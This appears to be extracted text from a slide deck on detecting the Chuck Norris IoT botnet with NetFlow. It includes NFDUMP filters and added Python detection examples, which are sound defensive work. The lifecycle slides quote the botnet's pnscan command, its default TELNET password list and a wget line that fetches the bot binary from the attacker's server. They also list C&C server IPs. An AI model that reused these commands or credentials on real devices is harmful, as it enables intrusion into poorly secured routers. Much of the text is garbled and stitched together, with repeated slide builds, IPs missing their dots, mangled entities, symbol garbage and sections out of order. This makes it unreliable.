Connections to Botnet C&C Center – Phase III
Bot's IRC traffic with the command and control center
[Diagram: an infected device in the local network opens TCP/1200 connections (SYN/ACK flags) to the botnet C&C server.]
NFDUMP detection filter:
(src net local_network) and (dst ip IRC_server²) and (dst port 1200) and (proto TCP) and (flags SA and not flag R)
² IP address of the attacker's IRC server (botnet C&C center)
DNS Spoofing Attack Detection – Phase IV
Attacker's DNS or OpenDNS Queries
Common DNS requests forwarded to OpenDNS servers
Targeted DNS requests forwarded to the attacker's spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
E.g. Facebook or banking sites
[Diagram: an infected device in the local network sends UDP/53 queries to an OpenDNS server and to the spoofed DNS server.]
NFDUMP detection filter:
(src net local_network) and ((dst ip OpenDNS servers³) or (dst ip DNS servers⁴)) and (proto UDP) and (dst port 53)
³ IP addresses of common OpenDNS servers
⁴ IP addresses of the attacker's spoofed DNS servers
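The Phase I–IV NFDUMP filters above, re-implemented as an added Python example (not the slides' or the NfSen plugin's code) and run over constructed flow records in nfdump's UAPRSF flag notation: each flow is matched against all four filters and the hits are correlated per source host, with a distinct-target count for the TELNET scan phase. The indicator addresses are those of the "Detected Chuck Norris Servers" slide; the local prefix 147.251.0.0/16 and the record layout are assumptions, and the C&C port follows that slide (12000) where the Phase III filter text reads 1200.

```python
"""Chuck Norris lifecycle detection over NetFlow records (added example)."""
from ipaddress import IPv4Address, ip_address, ip_network
from typing import NamedTuple

# Assumption: the campus prefix; the slides only show 147.251.x.x hosts.
LOCAL_NETWORK = ip_network("147.251.0.0/16")
# Indicators from the "Detected Chuck Norris Servers" slide.
WEB_SERVERS = {ip_address("87.98.173.190"), ip_address("87.98.163.86")}
IRC_SERVERS = {ip_address("87.98.173.190"), ip_address("87.98.163.86")}
IRC_PORT = 12000  # that slide's C&C port; the Phase III filter text shows 1200
OPENDNS_SERVERS = {ip_address("208.67.222.222"), ip_address("208.67.220.220")}
SPOOFED_DNS_SERVERS = {ip_address("87.98.163.86")}

class Flow(NamedTuple):
    src: IPv4Address
    dst: IPv4Address
    proto: str
    sport: int
    dport: int
    flags: frozenset  # TCP flag letters from nfdump's "UAPRSF" column

def parse_flows(text: str) -> list:
    """Parse constructed 'src,dst,proto,sport,dport,flags' records."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        src, dst, proto, sport, dport, flags = line.split(",")
        flows.append(Flow(ip_address(src), ip_address(dst), proto.upper(),
                          int(sport), int(dport), frozenset(flags.replace(".", ""))))
    return flows

# Phase I: the slide's (flags S and not flags ARPUF) or (flags SR and not flags APUF),
# read as SYN-only or SYN+RST flows; either endpoint may be local (in- and outgoing scans).
def telnet_scan(f: Flow) -> bool:
    return ((f.src in LOCAL_NETWORK or f.dst in LOCAL_NETWORK)
            and f.proto == "TCP" and f.dport == 23
            and f.flags in (frozenset("S"), frozenset("SR")))

# Phases II and III share one shape: local source, known server and port,
# a completed handshake (SYN and ACK seen) and no RST.
def _established_to(f: Flow, servers, port) -> bool:
    return (f.src in LOCAL_NETWORK and f.dst in servers and f.dport == port
            and f.proto == "TCP" and {"S", "A"} <= f.flags and "R" not in f.flags)

def distribution_site(f: Flow) -> bool:  # Phase II: bot download over HTTP
    return _established_to(f, WEB_SERVERS, 80)

def cnc_connection(f: Flow) -> bool:  # Phase III: IRC session to the C&C server
    return _established_to(f, IRC_SERVERS, IRC_PORT)

# Phase IV: local source, UDP/53, destination is an OpenDNS or the spoofed DNS server.
def dns_spoofing(f: Flow) -> bool:
    return (f.src in LOCAL_NETWORK and f.proto == "UDP" and f.dport == 53
            and f.dst in OPENDNS_SERVERS | SPOOFED_DNS_SERVERS)

PHASES = {"telnet_scan": telnet_scan, "distribution_site": distribution_site,
          "cnc": cnc_connection, "dns_spoofing": dns_spoofing}

def classify(f: Flow) -> frozenset:
    """Names of the lifecycle phases whose filter this flow matches."""
    return frozenset(name for name, pred in PHASES.items() if pred(f))

def detect(flows) -> dict:
    """Source address -> phases seen; several phases on one host beat any single filter."""
    report = {}
    for f in flows:
        phases = classify(f)
        if phases:
            report.setdefault(str(f.src), set()).update(phases)
    return report

def scan_targets(flows) -> dict:
    """Distinct TELNET targets per scanning source; a threshold here separates a scanner from one mistyped login."""
    targets = {}
    for f in flows:
        if telnet_scan(f):
            targets.setdefault(str(f.src), set()).add(f.dst)
    return {src: len(dsts) for src, dsts in targets.items()}

# Constructed sample records; scanned hosts use documentation address ranges.
SAMPLE_FLOWS = """
147.251.3.17,203.0.113.10,TCP,40001,23,....S.
147.251.3.17,203.0.113.11,TCP,40002,23,....S.
147.251.3.17,203.0.113.12,TCP,40003,23,...RS.
147.251.3.17,198.51.100.20,TCP,40004,23,....S.
147.251.3.17,87.98.163.86,TCP,40100,80,.AP.SF
147.251.3.17,87.98.163.86,TCP,40101,12000,.AP.S.
147.251.3.17,208.67.222.222,UDP,51000,53,......
147.251.3.17,87.98.163.86,UDP,51001,53,......
203.0.113.7,147.251.3.9,TCP,6000,23,....S.
147.251.5.1,198.51.100.80,TCP,53000,80,.AP.SF
147.251.5.1,208.67.222.222,UDP,53001,53,......
"""

if __name__ == "__main__":
    for host, phases in sorted(detect(parse_flows(SAMPLE_FLOWS)).items()):
        print(host, sorted(phases))
```

The last host shows why the plugin correlates methods: a single OpenDNS query matches the Phase IV filter on its own, while the infected device lights up all four phases.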
ADSL String Detection
Looking for ADSL String
ADSL string indicates the Chuck Norris botnet
Searching in the victim's hostname or the victim's WHOIS record
Querying the DNS server and parsing the received hostname
Querying the WHOIS database and parsing the received info
[Screenshot: DNS/WHOIS lookup result for a detected host containing the string "adsl".]
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses: 87.98.173.190, 87.98.163.86
IRC server addresses: 87.98.173.190, 87.98.163.86
IRC server port: 12000
OpenDNS server addresses: 208.67.222.222, 208.67.220.220
Spoofed DNS server: 87.98.163.86
This data is used in the detection methods by default
IP address updates are published on the project page
Part IV
NfSen Botnet Detection Plugin
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behavior
Based on NetFlow and other network data sources
Processes data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugin architecture recommendations
PHP frontend with a Perl backend and a PostgreSQL DB
Web, e-mail and syslog detection output and reporting
Plugin Architecture
[Diagram: BACKEND – cndet.pm with cndetdb.pm on top of a PostgreSQL database, reading NetFlow data, DNS and the WHOIS db; FRONTEND – cndet.php; the two sides communicate over the nfsend comm interface.]
Plugin Methods Architecture
[Diagram: cndetdb.pm with PostgreSQL, fed by NetFlow data, DNS and the WHOIS db, drives the five detection methods: Telnet scan detection, Botnet distribution sites detection, Botnet C&C centers detection, DNS spoofing attack detection, ADSL string detection.]
Web Interface ndash Infected Host Detected
Part V
Conclusion
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible bots
infection of a vulnerable device
bot initialization/update
botnet operation
Botnet Detection Plugin Customization
modular plugin engine
easy modification for the detection of other botnets
only the detection methods need to be customized
plugin distributed under the BSD license
Conclusion
Network Devices Are Not Protected
Routers, access points, printers, cameras, TVs, ...
No AV software, missing patches and firmware updates
But they should be protected
Experience
NetFlow can monitor all such devices in the network
Discovery of the new Chuck Norris botnet using NetFlow
Developed a specialized NfSen plugin for Chuck Norris botnet detection
Future
Chuck Norris is down but others are coming (e.g. Stuxnet)
We are open to research collaboration
Detection plugin is available at our project site
Thank You For Your Attention
Vojtěch Krmíček, Tomáš Plesník
vojtec|plesnik@ics.muni.cz
Project CYBER
http://www.muni.cz/ics/cyber
Detecting Botnets with NetFlow
This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801
FlowMon Probes at Masaryk University Campus
FlowMon probes NetFlow collectors
256
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 5 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
http
syslog
incident
reporting
mailbox
WWW
syslog
server
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
[Figure: BACKEND - cndet.pm, connected to the frontend through the nfsend communication interface, and cndetdb.pm with its data sources NetFlow data, DNS, WHOIS db and PostgreSQL; FRONTEND - cndet.php]
Plugin Methods Architecture
[Figure: cndetdb.pm with PostgreSQL and the data sources NetFlow data, DNS and WHOIS db, feeding the five detection methods]
- Telnet scan detection
- Botnet distribution sites detection
- Botnet C&C centers detection
- DNS spoofing attack detection
- ADSL string detection
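The five methods above as pluggable predicates over NetFlow-like records, written as an added example and not the plugin's own code: the match conditions follow the deck's NFDUMP filters and its default server list, while the local prefix 192.0.2.0/24, the sample flows and the scan threshold are constructed for this example. The engine is deliberately modular, in the spirit of the customization slide, so other botnets are a matter of swapping predicates and defaults.

```python
"""Added example, not the NfSen plugin's own code: the five Chuck Norris
detection methods as pluggable predicates over NetFlow-like records."""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Defaults from the deck's "Known IP Addresses" slide (historical 2009/2010 data).
WEB_SERVERS = {"87.98.173.190", "87.98.163.86"}
IRC_SERVERS = {"87.98.173.190", "87.98.163.86"}
IRC_PORT = 12000
OPENDNS_SERVERS = {"208.67.222.222", "208.67.220.220"}
SPOOFED_DNS_SERVERS = {"87.98.163.86"}
LOCAL_NET = ip_network("192.0.2.0/24")  # constructed local prefix (RFC 5737)
SCAN_THRESHOLD = 3  # distinct TCP/23 targets per host; an assumption, not from the deck


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str   # "TCP" or "UDP"
    dport: int
    flags: str   # TCP flags as nfdump prints them, e.g. "S", "SA", "SAPF"


def is_local(ip: str) -> bool:
    return ip_address(ip) in LOCAL_NET


def telnet_scan(f: Flow) -> bool:
    # Phase I: (net local_network) and (dst port 23) and (proto TCP) and
    # ((flags S and not flags ARPUF) or (flags SR and not flags APUF)),
    # read as a bare SYN or SYN+RST to TCP/23 with a local endpoint on either side.
    return (f.proto == "TCP" and f.dport == 23
            and (is_local(f.src) or is_local(f.dst))
            and set(f.flags) in ({"S"}, {"S", "R"}))


def _local_syn_ack_to(f: Flow, servers: set, port: int) -> bool:
    # Phases II/III share one shape: (src net local_network) and (dst ip X) and
    # (dst port N) and (proto TCP) and (flags SA and not flag R), i.e. a completed
    # handshake (SYN and ACK seen) that was not reset.
    return (f.proto == "TCP" and is_local(f.src) and f.dst in servers
            and f.dport == port and {"S", "A"} <= set(f.flags) and "R" not in f.flags)


def distribution_site(f: Flow) -> bool:          # Phase II: bot binary download
    return _local_syn_ack_to(f, WEB_SERVERS, 80)


def cc_center(f: Flow) -> bool:                  # Phase III: IRC C&C traffic
    return _local_syn_ack_to(f, IRC_SERVERS, IRC_PORT)


def dns_spoofing(f: Flow) -> bool:               # Phase IV: DNS leaving the network
    # (src net local_network) and ((dst ip OpenDNS) or (dst ip spoofed DNS)) and (proto UDP) and (dst port 53)
    return (f.proto == "UDP" and f.dport == 53 and is_local(f.src)
            and f.dst in OPENDNS_SERVERS | SPOOFED_DNS_SERVERS)


def adsl_string(hostname: str, whois_text: str) -> bool:
    """ADSL string detection: 'adsl' in the victim's reverse-DNS name or WHOIS record."""
    return "adsl" in hostname.lower() or "adsl" in whois_text.lower()


# Modular engine: methods are (name, predicate) pairs, so another botnet means
# swapping predicates and defaults rather than rewriting the loop.
FLOW_METHODS = [("telnet_scan", telnet_scan), ("distribution_site", distribution_site),
                ("cc_center", cc_center), ("dns_spoofing", dns_spoofing)]


def detect(flows):
    """Return {method: {local host, ...}} for every local host a method flags."""
    hits = defaultdict(set)
    scan_targets = defaultdict(set)
    for f in flows:
        for name, pred in FLOW_METHODS:
            if not pred(f):
                continue
            if name == "telnet_scan":
                # Incoming scans match the filter too, but only an outgoing one names a
                # local bot; count its distinct targets instead of alerting per flow.
                if is_local(f.src):
                    scan_targets[f.src].add(f.dst)
            else:
                hits[name].add(f.src)
    for src, targets in scan_targets.items():
        if len(targets) >= SCAN_THRESHOLD:
            hits["telnet_scan"].add(src)
    return dict(hits)


# Constructed sample: 192.0.2.10 behaves like an infected router, 192.0.2.20 is clean.
SAMPLE_FLOWS = [
    Flow("192.0.2.10", "198.51.100.1", "TCP", 23, "S"),
    Flow("192.0.2.10", "198.51.100.2", "TCP", 23, "S"),
    Flow("192.0.2.10", "198.51.100.3", "TCP", 23, "SR"),
    Flow("192.0.2.10", "87.98.163.86", "TCP", 80, "SA"),
    Flow("192.0.2.10", "87.98.173.190", "TCP", 12000, "SAP"),
    Flow("192.0.2.10", "208.67.222.222", "UDP", 53, ""),
    Flow("192.0.2.20", "198.51.100.9", "TCP", 80, "SAPF"),   # ordinary web browsing
    Flow("192.0.2.20", "192.0.2.1", "UDP", 53, ""),          # local resolver, not OpenDNS
    Flow("192.0.2.20", "87.98.163.86", "TCP", 80, "SR"),     # refused, so not a download
]

if __name__ == "__main__":
    for method, hosts in sorted(detect(SAMPLE_FLOWS).items()):
        print(f"{method:18s} {sorted(hosts)}")
```

Only the infected host is reported by all four flow-based methods; the clean host's connection to a known distribution server is ignored because it was reset rather than completed.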
Web Interface – Infected Host Detected
[Screenshot of the plugin's web interface]
Part V
Conclusion
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for the Majority of Botnets
- scanning for possible bots
- infection of a vulnerable device
- bot initialization/update
- botnet operation
Botnet Detection Plugin Customization
- modular plugin engine
- easy modification for the detection of other botnets
- we need to customize the detection methods
- plugin distributed under the BSD license
Conclusion
Network Devices Are Not Protected
- Routers, access points, printers, cameras, TVs
- No AV software, missing patches and firmware updates
- But they should be protected
Experience
- NetFlow can monitor all such devices in the network
- Discovery of the new Chuck Norris botnet using NetFlow
- Developed a specialized NfSen plugin for Chuck Norris botnet detection
Future
- Chuck Norris is down, but others are coming (e.g. Stuxnet)
- We are open to research collaboration
- The detection plugin is available at our project site
Thank You For Your Attention
Vojtěch Krmíček, Tomáš Plesník
vojtec|plesnik@ics.muni.cz
Project CYBER: http://www.muni.cz/ics/cyber
Detecting Botnets with NetFlow
This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801.
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
http
syslog
incident
reporting
mailbox
WWW
syslog
server
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
